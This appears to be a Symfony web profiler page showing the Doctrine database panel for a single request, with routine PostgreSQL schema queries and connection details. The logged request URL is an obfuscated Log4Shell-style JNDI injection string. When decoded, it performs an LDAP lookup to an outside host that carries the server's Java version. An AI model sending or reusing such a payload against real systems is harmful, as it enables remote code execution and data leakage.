https://rad-sdsc.ucsd.edu/${${i:-j}${6:bwa:rm4:-n}${pm:r9t:-d}${dm9:-i}${f:4:w:-:}${14w:9l:yxi:-l}${ebfs:jue:ed:-d}${e:kul3:n:-a}${ur:w:zjc7:-p}${5wn:6sg:-:}${z2:mt1:n6p:-/}${mz:04e:-/}${ldtq:0:-P}${ji:5y:-A}${a06:81c:-l}${a3:xz:lkh:-0}${4:j0b:mp:-c}${aj:--}${${jp:-s}${z7p:-y}${q7e:96m0:bpv:-s}${7z93:yiu:4ijt:-:}${xlhf:le:w:-j}${04r:7:-a}${le9:-v}${0x:-a}${6pf:gsd:6j4:-.}${8:9xv2:-v}${2:7sad:lyw:-e}${uzq:41i0:yw:-r}${9:m9:-s}${nv6:s23:34h:-i}${l6p:-o}${di:lh2:fp:-n}}${hg2:d:j4:-.}${7my:8r:6p8n:-1}${rl8:8:17:-0}${vb0:9:-1}${n04h:z:-4}${u:3rh:-e}${m:h:-4}${6:gwl:-5}${l1:g614:-0}${y8v:egl:-2}${v3:l:-1}${z:6p:o:-5}${l5:e3:-3}${qb:sik6:trwl:-f}${76y:vqd:fl79:-2}${kq8z:aidq:-1}${64b:p:-8}${o:-5}${a:col:xwui:-6}${p:5d1:5jgi:-7}${duj:3w5f:-7}${hoyu:1i:dn:-b}${oh:-d}${9dl:t1r:-8}${q:-d}${s79q:if:qiur:-5}${6h:-7}${u6:d:x:-9}${at:5st:jlr:-1}${jbkx:-8}${bpmn:j:-6}${is:seg:-6}${5:6:-f}${706:-3}${m:4:oe81:-3}${r:5i:-8}${k:mgyw:-f}${c:zmvh:-d}${ci7:3tjl:7n0:-9}${pt:-0}${ah9:jn:sg:-e}${y:-2}${3f:-a}${wf9:5neu:yu:-.}${zn:bx9z:g5l:-d}${6:7eb:kmlb:-n}${5v8:-s}${f:--}${w:-e}${u:4:-x}${g:-f}${8e:l:-i}${b:-l}${imns:o4:-.}${2:hnoi:43l5:-m}${bol9:9eu:-a}${y:-s}${q1:-m}${slcn:-c}${ix94:1:x0:-o}${rc:w:-r}${n09m:eji:-e}${s4o:1437:--}${4c:-c}${v2l:0xy:8j:-f}${s:jk4:j:--}${9f1x:ckb:-p}${ome:7ik:i:-r}${jeyp:kxv:-o}${mskx:9ma:a:-d}${q2n:l:--}${zvws:-0}${rqu:-2}${qae:8nj:-.}${02:7n2:-m}${w8:6:-a}${yoa:0pk:-s}${ch:-m}${mc:p:6:-.}${cn8:7ndt:-c}${r3h5:usp:dklt:-l}${aut:ux:-o}${em3:-u}${30uq:r6mp:v:-d}${vu:f:-f}${u0h:-e}${jgu:-r}${lnm:ph:-r}${0:-y}${rxu:-.}${wdx:v:sr:-g}${ht:rg0p:3aew:-o}${o:4fu:7:-o}${pt:-g}}

Query Metrics

14 Database Queries
10 Different statements
8.96 ms Query time
0 Invalid entities

Queries

Group similar statements

# Time Info
1 3.35 ms
SELECT quote_ident(table_name) AS table_name,
                       table_schema AS schema_name
                FROM   information_schema.tables
                WHERE  table_schema NOT LIKE 'pg\_%'
                AND    table_schema != 'information_schema'
                AND    table_name != 'geometry_columns'
                AND    table_name != 'spatial_ref_sys'
                AND    table_type != 'VIEW'
Parameters:
[]
2 0.44 ms
SELECT schema_name
FROM   information_schema.schemata
WHERE  schema_name NOT LIKE 'pg\_%'
AND    schema_name != 'information_schema'
Parameters:
[]
3 0.11 ms
SHOW search_path
Parameters:
[]
4 0.94 ms
SELECT quote_ident(table_name) AS table_name,
                       table_schema AS schema_name
                FROM   information_schema.tables
                WHERE  table_schema NOT LIKE 'pg\_%'
                AND    table_schema != 'information_schema'
                AND    table_name != 'geometry_columns'
                AND    table_name != 'spatial_ref_sys'
                AND    table_type != 'VIEW'
Parameters:
[]
5 0.16 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
6 1.64 ms
SELECT
                    a.attnum,
                    quote_ident(a.attname) AS field,
                    t.typname AS type,
                    format_type(a.atttypid, a.atttypmod) AS complete_type,
                    (SELECT tc.collcollate FROM pg_catalog.pg_collation tc WHERE tc.oid = a.attcollation) AS collation,
                    (SELECT t1.typname FROM pg_catalog.pg_type t1 WHERE t1.oid = t.typbasetype) AS domain_type,
                    (SELECT format_type(t2.typbasetype, t2.typtypmod) FROM
                      pg_catalog.pg_type t2 WHERE t2.typtype = 'd' AND t2.oid = a.atttypid) AS domain_complete_type,
                    a.attnotnull AS isnotnull,
                    (SELECT 't'
                     FROM pg_index
                     WHERE c.oid = pg_index.indrelid
                        AND pg_index.indkey[0] = a.attnum
                        AND pg_index.indisprimary = 't'
                    ) AS pri,
                    (SELECT pg_get_expr(adbin, adrelid)
                     FROM pg_attrdef
                     WHERE c.oid = pg_attrdef.adrelid
                        AND pg_attrdef.adnum=a.attnum
                    ) AS default,
                    (SELECT pg_description.description
                        FROM pg_description WHERE pg_description.objoid = c.oid AND a.attnum = pg_description.objsubid
                    ) AS comment
                    FROM pg_attribute a, pg_class c, pg_type t, pg_namespace n
                    WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false))
                        AND a.attnum > 0
                        AND a.attrelid = c.oid
                        AND a.atttypid = t.oid
                        AND n.oid = c.relnamespace
                    ORDER BY a.attnum
Parameters:
[]
7 0.13 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
8 0.45 ms
SELECT quote_ident(r.conname) as conname, pg_catalog.pg_get_constraintdef(r.oid, true) as condef
                  FROM pg_catalog.pg_constraint r
                  WHERE r.conrelid =
                  (
                      SELECT c.oid
                      FROM pg_catalog.pg_class c, pg_catalog.pg_namespace n
                      WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false)) AND n.oid = c.relnamespace
                  )
                  AND r.contype = 'f'
Parameters:
[]
9 0.12 ms
SELECT CURRENT_DATABASE()
Parameters:
[]
10 0.62 ms
SELECT quote_ident(relname) as relname, pg_index.indisunique, pg_index.indisprimary,
                       pg_index.indkey, pg_index.indrelid,
                       pg_get_expr(indpred, indrelid) AS where
                 FROM pg_class, pg_index
                 WHERE oid IN (
                    SELECT indexrelid
                    FROM pg_index si, pg_class sc, pg_namespace sn
                    WHERE sn.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND sc.relname = 'doctrine_migration_versions' AND sn.nspname = ANY(current_schemas(false))
                    AND sc.oid=si.indrelid AND sc.relnamespace = sn.oid
                 ) AND pg_index.indexrelid = oid
Parameters:
[]
11 0.36 ms
SELECT attnum, attname FROM pg_attribute WHERE attrelid=33130 AND attnum IN (1) ORDER BY attnum ASC
Parameters:
[]
12 0.26 ms
SELECT obj_description('doctrine_migration_versions'::regclass) AS table_comment;
Parameters:
[]
13 0.21 ms
SELECT * FROM doctrine_migration_versions
Parameters:
[]
14 0.15 ms
SELECT CURRENT_DATABASE()
Parameters:
[]

Database Connections

Name Service
default doctrine.dbal.default_connection

Entity Managers

Name Service
default doctrine.orm.default_entity_manager

Second Level Cache

Second Level Cache is not enabled.

Entities Mapping

No loaded entities.